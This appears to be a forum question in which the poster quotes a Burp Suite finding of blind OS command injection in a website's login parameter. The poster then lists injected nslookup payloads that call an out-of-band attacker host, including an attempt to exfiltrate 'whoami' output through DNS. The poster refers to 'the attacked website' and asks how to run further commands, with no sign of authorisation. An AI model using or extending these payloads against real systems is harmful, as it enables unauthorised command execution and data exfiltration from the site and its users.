Blind OS command injection with out-of-band data exfiltration
currently burp suite scanner found a vulnerability on the website with the following characteristics:
Issue: OS command injection Severity: High Confidence: Certain
Issue detail
The login parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses. However, it is possible to cause the application to interact with an external domain, to verify that a command was executed. The payload '"0&nslookup -q=cname zvyhsfj1h2og1pio9tv7zm0ac1itbh451ttgj48.oastify.com.&
' was submitted in the login parameter. The application performed a DNS lookup for the specified domain name.
and indeed!!
the web attacker successfully responds to Exploiting blind operating system command injection using out-of-band
& nslookup kgji2ohoyw.web-attacker.com &
but unfortunately the attacked website does not respond to anything else such as Blind OS command injection with out-of-band interaction
& nslookup whoami
.kgji2ohoyw.web-attacker.com &
and it doesn't respond to whoami command or anything else other than just (OAST) technique only using nslookup!
I want to be able to run other commands like whoami with nslookup, ping or anything else, since only the attacked website only responds to nslookup and only that